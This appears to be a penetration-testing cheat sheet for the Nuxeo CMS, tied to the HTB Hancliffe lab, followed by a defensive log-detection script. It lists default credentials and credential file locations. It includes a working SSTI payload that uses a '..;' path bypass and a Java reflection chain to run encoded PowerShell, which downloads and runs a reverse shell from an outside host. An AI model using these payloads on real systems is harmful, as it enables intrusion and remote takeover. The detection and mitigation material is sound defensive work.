Nuxeo

rce, cms, enum, java, ssti, web

Overview #

Version Detection #

# Version is 10.2
Copyright © 2001-2022 Nuxeo and respective authors. Nuxeo Platform FT 10.2

Credentials #

# Default credentials
Administrator:Administrator

# Some DB Users to try
nuxeo

Interesting Files and Directories #

# Nuxeo config (Windows install path). Database credentials can be read from here.
C:\programdata\nuxeo\conf\nuxeo.conf

# Tomcat config directory
conf/

# Nuxeo Shell (nxshell) per-user settings and command history
~/.nxshell
C:\users\svc_account\.nxshell\history
C:\users\svc_account\.nxshell\shell.properties

Interesting URL paths #

/nuxeo
/nuxeo/login.jsp
/nxserver
/nxstartup.faces

Interesting Database Tables #

users
digestauth
content
groups
userinfo
note

Interesting Elasticsearch Data #

# Audit index (who did what, and when) and the document index, on the default port 9200
curl 'http://localhost:9200/nuxeo-audit/_search?pretty=true'
curl 'http://localhost:9200/nuxeo/_search?pretty=true'

Vulnerabilities, Attacks and Exploits #

# HTB Hancliffe SSTI test payload. The `/maintenance/..;/` segment abuses a
# URI parsing vulnerability (the `..;` path segment passes the front-end path
# check but is collapsed by the back end), which is how the request reaches
# login.jsp. `${7+7}` in the .xhtml name probes for expression evaluation.
http://hancliffe/maintenance/..;/login.jsp/pwn$%7B7+7%7D.xhtml

# Same SSTI, with a Java reflection chain that runs a base64-encoded PowerShell command
http://hancliffe/maintenance/..;/login.jsp/pwn$%7B%22%22.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22powershell%20-encodedcommand%20SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMANAAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQA=%22,null).waitFor()%7D.xhtml
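From the defender's side, both payloads above leave very recognisable traces in the Tomcat access log: a `..;` path segment and a URL-encoded `${...}` expression in the request path, ending in `.xhtml`. The following detection script is an added example written for these notes, not code from Nuxeo or from the HTB box. The log lines are constructed in Tomcat's default "common" format, and the tag names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Tomcat "common" format). None come from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2022:10:00:01 +0000] "GET /nuxeo/login.jsp HTTP/1.1" 200 5123
10.0.0.7 - - [01/Jan/2022:10:00:02 +0000] "GET /maintenance/..;/login.jsp/pwn$%7B7+7%7D.xhtml HTTP/1.1" 200 812
10.0.0.7 - - [01/Jan/2022:10:00:03 +0000] "GET /maintenance/..;/login.jsp/pwn$%7B%22%22.getClass().forName(%22java.lang.Runtime%22)%7D.xhtml HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2022:10:00:04 +0000] "GET /maintenance/status HTTP/1.1" 200 33
10.0.0.9 - - [01/Jan/2022:10:00:05 +0000] "GET /nuxeo/site/automation HTTP/1.1" 401 0
"""

# ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Unified EL / Facelets expressions look like ${...} or #{...}
EL_RE = re.compile(r'[$#]\{[^}]*\}')

# Reflection primitives that have no business appearing in a request path
SENSITIVE_CALLS = ('getClass()', 'forName(', 'getRuntime', '.exec(', 'ProcessBuilder')


def analyse_path(raw_path):
    """Return a list of finding tags for one (URL-encoded) request path."""
    findings = []
    decoded = unquote(raw_path)  # decode %7B -> { etc.; '+' is left alone on purpose

    # A "..;" segment survives naive prefix checks on the front end but is
    # collapsed by the back end during normalisation, so it is a strong signal.
    if '..;' in decoded:
        findings.append('path-param-traversal')
    if EL_RE.search(decoded):
        findings.append('el-expression-in-path')
    if any(call in decoded for call in SENSITIVE_CALLS):
        findings.append('reflection-chain')
    # An expression inside a requested .xhtml name is the Facelets SSTI pattern
    if decoded.lower().endswith('.xhtml') and 'el-expression-in-path' in findings:
        findings.append('possible-facelets-ssti')
    return findings


def scan_log(text):
    """Parse access-log text and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        tags = analyse_path(m['path'])
        if tags:
            alerts.append({
                'ip': m['ip'],
                'ts': m['ts'],
                'path': m['path'],
                'status': int(m['status']),
                'tags': tags,
            })
    return alerts


if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(alert['ts'], alert['ip'], alert['status'], ','.join(alert['tags']), alert['path'])
```

A 200 response on a `possible-facelets-ssti` hit is the case worth escalating: it means the template engine accepted the path. Blocking `..;` segments at the reverse proxy (or rejecting any path that still contains `;` after normalisation) removes the bypass that makes the payload reachable in the first place.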

References #